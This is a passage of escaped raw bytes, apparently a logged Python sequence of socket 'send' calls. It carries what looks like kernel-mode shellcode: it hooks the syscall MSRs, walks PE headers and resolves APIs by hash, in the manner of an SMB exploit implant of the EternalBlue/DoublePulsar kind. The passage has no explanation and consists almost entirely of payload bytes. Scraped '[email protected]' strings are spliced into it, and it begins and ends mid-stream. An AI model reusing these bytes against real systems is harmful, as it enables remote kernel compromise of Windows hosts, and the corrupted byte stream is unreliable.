00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 6, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\x